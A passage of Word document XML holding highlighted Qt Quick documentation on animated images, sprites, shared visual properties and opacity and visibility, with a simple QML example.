          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, suitable for images used as borders.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId458" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnimatedImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plays animated .</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and .</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mng</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> images.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId459" w:anchor="animatedsprite" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnimatedSprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId460" w:anchor="spritesequence" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpriteSequence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">play animations comprised of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multiple frames stored adjacently</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a non animated image format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For displaying </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>video files</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>camera data</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId461" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Multimedia</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00E87E39">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="shared-visual-properties"/>
      <w:bookmarkStart w:id="601" w:name="_Toc483000658"/>
      <w:bookmarkStart w:id="602" w:name="_Toc483003675"/>
      <w:bookmarkStart w:id="603" w:name="_Toc483604011"/>
      <w:bookmarkStart w:id="604" w:name="_Toc483605231"/>
      <w:bookmarkEnd w:id="600"/>
      <w:r w:rsidRPr="00E87E39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shared Visual Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
      <w:bookmarkEnd w:id="602"/>
      <w:bookmarkEnd w:id="603"/>
      <w:bookmarkEnd w:id="604"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual items</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId462" w:history="1">
        <w:r w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are based on the Item type</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>common set of attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for visual items, including opacity and transform attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="opacity-and-visibility"/>
      <w:bookmarkStart w:id="606" w:name="_Toc483000659"/>
      <w:bookmarkStart w:id="607" w:name="_Toc483003676"/>
      <w:bookmarkStart w:id="608" w:name="_Toc483604012"/>
      <w:bookmarkStart w:id="609" w:name="_Toc483605232"/>
      <w:bookmarkEnd w:id="605"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opacity and Visibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>
      <w:bookmarkEnd w:id="607"/>
      <w:bookmarkEnd w:id="608"/>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The QML object types provided by </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> have built-in support for</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId463" w:anchor="opacity-prop" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>opacity</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Opacity </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be animated</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow smooth transitions to or from a transparent state. Visibility can also be managed with the</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId464" w:anchor="visible-prop" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visible</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property more efficiently, but at the cost of not being able to animate it.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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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320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480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Rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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Item</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x</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y</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270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MouseArea</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anchors</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fill</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parent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onClicked</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topRect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visible </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topRect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visible</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Rectangle</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x</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y</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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Rectangle</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id</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topRect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opacity</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0.5</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x</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y</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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rPr>
      </w:pP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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
